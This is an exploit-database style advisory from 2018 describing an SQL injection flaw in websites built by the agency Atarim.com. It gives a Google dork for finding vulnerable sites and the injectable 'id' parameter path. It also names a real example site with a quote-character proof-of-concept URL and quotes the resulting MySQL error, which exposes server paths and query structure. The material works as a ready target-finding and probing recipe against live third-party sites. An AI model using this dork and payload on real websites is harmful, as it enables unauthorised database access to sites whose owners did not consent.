#################################################################################################
# Exploit Title : Design By Atarim.Com Israel International Internet Agency SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 26/06/2018
# Vendor Homepage : atarim.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : intext:''design: atarim''
# Exploit : /index.php?cntr=e/news.php?id=[SQL Inj]
#################################################################################################
# Example Site => isr-tkd.com/index.php?cntr=e/news.php?id=1%27 => [ Proof of Concept ] => archive.is/u4i87
# SQL Database Error =>
Warning: mysql_result() expects parameter 1 to be resource, boolean given in /home/isrtkd/public_html/press.php on line 4
Erreur de requete sql
Contenu de la requete: SELECT clubs.id AS clubid, sportifs.id, team, sportifs.name_e/news.php?id=1
AS bitmname, clubs.name_e/news.php?id=1 AS bitmclname
FROM sportifs JOIN clubs ON sportifs.club=clubs.id WHERE sportifs.id=1
Erreur retournee:You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '?id=1 AS bitmname, clubs.name_e/news.php?id=1
AS bitmclname FROM sportifs JOIN c' at line 1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################